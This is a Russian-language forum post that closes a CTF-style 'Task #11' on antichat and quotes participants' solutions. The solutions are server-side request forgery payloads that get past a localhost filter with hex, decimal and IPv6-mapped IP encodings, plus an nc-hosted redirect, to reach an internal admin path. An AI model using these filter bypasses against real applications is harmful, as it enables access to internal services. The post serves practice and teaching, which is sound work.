Тема: Task #11
Показать сообщение отдельно

  #15  
Старый 10.05.2020, 18:37
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами: 4033046

Репутация: 212
По умолчанию

Прохождения участников

.SpoilerTarget" type="button">Spoiler: +++

Цитата:
Сообщение от gurux13  

Итого, мой url:
Код:
http://task.antichat.com:1111/reader/index.php?name=http://2995563432:9898/
А сервер отдаёт
Код:
HTTP/1.0 302 Found
Location: http://localhost:1111/tpl_admin/
Цитата:
Сообщение от gurux13  

Код:
http://task.antichat.com:1111/reader/index.php?name=http://[::ffff:7f00:1]:01111/tpl_admin/
Цитата:
Сообщение от manfromkz  

Привет!
Обходим фильтр с помощью HEX-представления:
Код:
0.0.0.0 => 0x0
http://task.antichat.com:1111/reader/index.php?name=http://0x0:01111/tpl_admin

127.0.0.1 => 0x7f000001
http://task.antichat.com:1111/reader/index.php?name=http://0x7f000001:01111/tpl_admin
Цитата:
Сообщение от manfromkz  

Привет!
На своем сервере делаем:
Код:
nc -lvp 1234
Как только запустился nc, пишем туда:
Код:
HTTP/1.1 301 Moved Permanently
Location: http://127.0.0.1:1111/tpl_admin
Connection:close
Превращаем айпи своего сервака в тот же hex и вызываем:
Код:
http://task.antichat.com:1111/reader/index.php?name=http://тут_айпи_в_хекс:1234
Проверил - работает.
Цитата:
Сообщение от joelblack  

В итоге нам подходит Hexadecimal IP
Код:
GET /reader/index.php?name=http://0x7F000001:01111/tpl_admin HTTP/1.1[/B]
Host: task.antichat.com:1111
2.Так как нам разрешены : и [], то понимаем что можем использовать ipv6
Link2
Код:
GET /reader/index.php?name=http://[::ffff:7f00:1]:01111/tpl_admin/ HTTP/1.1
Host: task.antichat.com:1111
Цитата:
Сообщение от Franky_T  

GET /reader/index.php?name=
http://0x7F000001:01111/tpl_admin
и получаем флаг
Благодарю всех за участие! Таск закрыт.
 
Ответить с цитированием